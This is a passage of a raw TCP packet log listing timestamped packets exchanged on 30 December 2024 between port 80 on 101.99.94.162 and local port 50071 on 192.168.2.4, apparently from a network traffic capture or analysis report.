                                                                                                                                                                                Dec 30, 2024 19:45:49.334867001 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.334872007 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.334878922 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.334897041 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.334925890 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.334929943 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.334956884 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.334966898 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.334978104 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.334988117 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.334999084 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335022926 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335099936 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335109949 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335122108 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335131884 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335145950 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335160017 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335189104 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335200071 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335211039 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335228920 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335264921 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335319996 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335336924 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335345984 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335355997 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335386038 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335483074 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335494995 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335505009 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335529089 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335549116 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335561037 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335570097 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335592031 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335608006 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335741043 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335752010 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335762024 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335784912 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335798025 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335813999 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335823059 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335844040 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335864067 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335900068 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335910082 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335952997 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335961103 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.335963964 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335975885 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.335985899 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.336004019 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.336030006 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.443871021 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443891048 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443902969 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443921089 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443933010 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443933010 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.443943977 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443957090 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443964005 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.443967104 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443978071 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.443979979 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.443990946 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444004059 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444006920 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444015026 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444020987 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444032907 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444060087 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444080114 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444242954 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444287062 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444298029 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444324017 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444348097 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444359064 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444369078 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444379091 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444392920 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444402933 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444411993 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444422007 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444422960 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444434881 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444447041 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444479942 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444593906 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444610119 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444621086 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444632053 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444664001 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444722891 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444732904 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444771051 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444782019 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444792986 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444793940 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444806099 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444816113 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444852114 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.444941998 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444952965 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444963932 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444974899 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.444988012 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445012093 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445035934 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445045948 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445096016 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445270061 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445281982 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445291996 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445323944 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445415974 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445426941 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445439100 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445452929 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445463896 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445463896 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445488930 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445502043 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445517063 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445527077 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445542097 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445553064 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445569038 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445569992 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445580006 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445586920 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445631027 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445635080 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445647001 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445656061 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445681095 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445702076 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445712090 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445723057 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445744991 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445763111 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445868015 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445878983 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445898056 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445909977 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.445928097 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.445950985 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553492069 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553504944 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553545952 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553558111 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553570032 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553566933 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553582907 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553606033 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553618908 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553639889 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553715944 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553725004 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553735971 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553746939 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553755999 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553766966 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553792000 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553800106 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553802013 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553906918 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553916931 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553926945 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553941011 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553951025 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553961992 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553970098 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.553977966 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.553980112 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554014921 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554025888 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554028988 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554040909 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554073095 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554138899 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554148912 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554167032 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554176092 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554188967 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554224014 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554264069 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554274082 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554306030 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554312944 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554322958 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554356098 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554394007 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554404974 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554416895 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554434061 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554460049 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554616928 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554636955 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554649115 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554658890 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554666042 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554675102 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554718018 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554893970 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554905891 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554915905 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554932117 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554939032 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.554946899 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554955959 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.554966927 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555044889 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555053949 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555073977 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555094957 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555104971 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555114985 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555157900 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555172920 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555183887 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555192947 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555214882 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555226088 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555234909 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555239916 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555275917 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555285931 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555295944 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555332899 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555373907 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555385113 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555394888 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555434942 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555496931 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555505991 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555516958 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555530071 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555541992 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555568933 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555581093 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555592060 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555619001 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555627108 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555628061 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555659056 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555687904 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555697918 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555727959 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555730104 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555737972 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555777073 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.555813074 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555860043 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555869102 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555879116 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.555912971 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.643832922 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.674971104 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675065994 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675077915 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675088882 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675098896 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675112009 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675120115 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675122976 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675144911 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675158978 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675203085 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675214052 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675224066 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675235987 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675246000 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675251007 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675257921 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675265074 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675271034 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675282001 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675288916 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675292969 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675303936 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675317049 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675321102 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675347090 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675354004 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675357103 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675365925 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675376892 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675389051 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:49.675401926 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:49.675405025 CET8050071101.99.94.162192.168.2.4
